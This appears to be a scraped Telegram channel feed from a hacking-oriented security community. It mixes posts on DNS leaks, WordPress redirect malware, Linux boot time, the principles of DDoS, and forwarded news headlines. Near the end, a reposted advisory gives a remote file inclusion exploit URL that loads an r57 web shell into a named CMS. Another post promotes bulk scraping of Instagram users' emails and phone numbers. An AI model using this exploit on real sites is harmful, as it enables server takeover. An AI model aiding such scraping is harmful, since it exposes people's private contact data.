UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is a DNS leak and why it matters👨⚕️ ?

1) When using an anonymity or privacy service, it is extremely important that all traffic originating from your computer is routed through the anonymity network.

2) If any traffic flows outside of a secure connection to the network, any adversary controlling your traffic will be able to register your activity.

3) DNS or Domain Name System is used to translate domain names such as www.privacyinternational.org into numeric IP addresses, for example. 123.123.123.123, which are required to route data packets on the Internet.

4) Whenever your computer needs to contact a server on the Internet, for example when you enter a URL in your browser, your computer contacts the DNS server and asks for an IP address.

5) Most ISPs assign their customers a DNS server that they control and use to log and record your online activities.

6) Under certain conditions, even when connected to the anonymity network, the operating system will continue to use its default DNS servers instead of the anonymous DNS servers assigned to your computer over the anonymity network.

7) DNS leaks pose a serious privacy threat because an anonymous network can provide a false sense of security while personal data is leaked.

8) If you are concerned about a DNS leak, you must also understand DNS transparent proxy technology to ensure that the solution you choose preserves your privacy.

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Variations and Symptoms of the WordPress Redirect Hack :

1) Classic Redirection Hack

The hacked redirect has been around since the longest time. Every time someone visits your website, they're redirected to questionable links like pharma sites, adult websites etc.

2) Redirection via Search Results

When website is opened by entering the URL in the browser, it opens fine. But when opened by searching on Google, it redirects to malicious websites.

3) Device Specific WordPress Redirection

The website only redirects when opened from mobile device or only redirects when opened from desktop depending on what type of malware is present.


4) Push Notifications Hack

We've seen this one since last few months where hackers also show browser push notifications to your visitors. Usually these push notifications point to porn websites.


5) Geography Specific Redirection

In some cases, some visitors of yours might see a redirection and some might not. This could be because hackers program the malware to work only for certain geographies. Where exactly the malware redirects also can be tailored geography-wise by hackers.

some wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Telegram down
Forwarded from UNDERCODE NEWS
Microsoft removes 18 Azure Active Directory apps after being abused by Chinese hackers
#CyberAttacks
_
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to determine when the Linux operating system was booted ? #ForAdvanced

1) There is a simple solution, because we can directly use the / proc filesystem.

Use the / proc / stat file which contains kernel / system statistics.

$ cat / proc / stat
cpu 13014200 24406 4799169 40794104 34102 0 96456 0 0 0
cpu0 3273277 5052 1208241 30257443 16180 0 30562 0 0 0
cpu1 3258376 6672 1187026 3510180 8958 0 25642 0 0 0
cpu2 3266882 6158 1193469 3501113 4998 0 29868 0 0 0
cpu3 3215665 6523 1210432 3525367 3964 0 10383 0 0 0
intr 539439101 9 389 0 0 0 0 0 15646 1 2595538 0 0 15 0 0 0 0 0 0 0 0 347 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 253 0 0 0 0 1483731 313 4800809 44745763 0 7901501 18 629 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ctxt 2042251595
btime 1578304868
processes 196905
procs_running 1
procs_blocked 0
softirq 310354343 39361834 94774221 414 442124 4311767 39 489577 97929159 0 73045208

2) Let's calculate the btime value, which contains the loading time in seconds since the start.

$ awk '/ btime / {print $ 2}' / proc / stat
1578304868

3) Convert seconds from start to date using awk, xargs and date.
$ awk '/ btime / {print $ 2}' / proc / stat | xargs -IUNIX_TIMESTAMP date --date @UNIX_TIMESTAMP
Mon Jan 6 11:01:08 CET 2020

4) Convert seconds elapsed from start to date using awk and date.

$ awk '/ btime / {command = "date --date @" $ 2; system (command)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020

5) Convert seconds to date using only awk.

$ awk '/ btime / {print strftime ("% a% b% e% H:% M:% S% Z% Y", $ 2)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures

1) Definition of DDoS

The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.

The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.

When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.

2) The principle of DDoS attack

look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.

Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.

For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
medium_com_growmeorganic_how_to_extract_bulk_emails_and_phone_numbers.pdf
2 MB

EXTRACT PHONE NUMBER & EMAIL FROM INSTAGRAM :

What
data can you export with GrowMeOrganic?
Instagram Username
Full Name
Email
Phone Number
Website
Bio
Country
City
Zip Code
Address
Followers Count
Following Count
Is Business
Category
Business Potential (Using Instagram AI)
Is Private
Is Verified


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
The Polish hack group traded in extortion, SIM spoofing and even fake bomb threats
#CyberAttacks
_
Forwarded from UNDERCODE NEWS
For the first time in 10 years: Wikipedia will be redesigned
#Updates
_
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :

Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :

# require_once ($path.'/classes/feedStories.class.php');

EXPLOIT :

www.[Target].com/path/includes/home.php?path=[r57.txt?]

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Spy on the table: why are voice assistants dangerous?
#Vulnerabilities
_